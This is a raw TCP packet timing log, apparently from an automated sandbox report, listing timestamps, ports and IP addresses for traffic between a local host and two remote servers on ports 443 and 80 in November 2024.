                                                                            Nov 26, 2024 09:44:28.879085064 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.883796930 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.883873940 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.883882999 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.887207031 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.887262106 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.887269974 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.891030073 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.891108036 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.891115904 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.895457029 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.895526886 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.895534039 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.899014950 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.899074078 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.899080992 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.902654886 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.902723074 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.902729988 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.907361984 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.907411098 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.907418966 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.910936117 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.911009073 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.911016941 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.915033102 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.915102959 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.915111065 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.918886900 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.918946028 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.918967962 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.923265934 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.923347950 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.923368931 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.926791906 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.926848888 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.926873922 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.930500984 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.930555105 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.930566072 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.935043097 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.935115099 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:28.935122967 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:28.980319977 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.080873013 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.081046104 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.081077099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.085906029 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.086004972 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.086030960 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.089553118 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.089662075 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.089684963 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.093085051 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.093178034 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.093199968 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.097799063 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.097862005 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.097884893 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.101744890 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.101814985 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.101833105 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.105926991 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.106014013 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.106034994 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.107825041 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.107911110 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.107927084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.110747099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.110847950 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.110869884 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.114164114 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.114254951 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.114269018 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.117652893 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.117722988 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.117739916 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.122159004 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.122256994 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.122271061 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.125375986 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.125453949 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.125466108 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.130867004 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.130985022 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.130997896 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.135044098 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.135116100 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.135127068 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.137919903 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.137986898 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.137998104 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.183484077 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.280145884 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.280323029 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.280349016 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.284677982 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.284760952 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.284770966 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.287348986 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.287435055 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.287442923 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.289820910 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.289912939 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.289920092 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.294292927 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.294357061 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.294365883 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.297863960 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.297938108 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.297945976 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.301631927 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.301708937 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.301716089 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.306442976 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.306525946 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.306535006 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.309811115 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.309891939 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.309900999 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.313677073 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.313762903 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.313771009 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.317809105 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.317941904 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.317950010 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.322134018 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.322220087 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.322227955 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.325613022 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.325709105 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.325717926 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.329468012 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.329539061 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.329545975 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.333934069 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.334104061 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.334131002 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.337683916 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.337759972 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.337769032 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.386670113 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.479217052 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.483834028 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.483848095 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.483861923 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.483901024 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.483918905 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.487365007 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.487442017 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.487464905 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.491152048 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.491219044 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.491239071 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.495702028 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.495935917 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.495956898 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.500775099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.500848055 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.500864983 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.502826929 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.502883911 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.502893925 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.507615089 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.507683039 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.507697105 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.511096001 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.511157036 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.511176109 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.514645100 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.514710903 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.514728069 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.518851042 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.518904924 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.518924952 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.523546934 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.523614883 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.523628950 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.527478933 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.527527094 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.527537107 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.530621052 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.530694008 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.530714035 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.535252094 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.535325050 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.535341978 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.538908005 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.538959026 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.538980961 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.589742899 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.681303024 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.681317091 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.681454897 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.681488037 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.684983015 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.685046911 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.685069084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.688903093 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.688973904 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.688996077 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.693094969 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.693161011 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.693182945 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.696532011 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.696629047 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.696645021 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.700170040 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.700237989 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.700249910 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.704873085 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.704940081 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.704955101 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.708475113 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.708535910 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.708543062 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.711973906 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.712044954 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.712054014 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.716772079 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.716845036 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.716856956 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.720848083 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.720912933 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.720925093 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.724224091 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.724298000 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.724308014 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.727874041 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.727961063 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.727978945 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.732430935 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.732510090 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.732532024 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.736080885 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.736141920 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.736159086 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.739645958 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.739708900 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.739731073 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.792797089 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.882664919 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.882678032 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.882946968 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.882983923 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.886151075 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.886236906 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.886259079 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.889671087 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.889754057 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.889775038 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.894309044 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.894391060 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.894412041 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.897986889 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.898077011 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.898103952 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.901537895 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.901623011 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.901633978 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.901690960 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.905452013 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:45.239092112 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:45.359564066 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:45.359776974 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:45.359901905 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:45.479937077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520169020 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520195007 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520209074 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520221949 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520241976 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520253897 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520267010 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520303965 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520311117 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.520315886 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520328999 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.520417929 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.641349077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.641392946 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.641511917 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.721429110 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.721448898 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.721707106 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.725502014 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.727046967 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.727108955 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.727140903 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.735512972 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.735595942 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.735613108 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.744009972 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.744040966 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.744103909 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.752851009 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.752918959 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.753015041 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.760911942 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.760953903 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.760993004 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.769263029 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.769344091 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.769464016 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.777674913 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.777801991 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.777810097 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.786175966 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.786271095 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.786320925 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.794559002 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.794648886 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.794730902 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.803118944 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.803205013 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.922728062 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.922772884 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.922943115 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.924190998 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.924217939 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.924293995 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.929605961 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.929655075 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.929745913 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.933926105 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.933984995 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.934051037 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.939413071 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.939430952 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.939508915 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:46.944277048 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.944329023 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:46.944434881 CET4973880192.168.2.4104.168.46.26
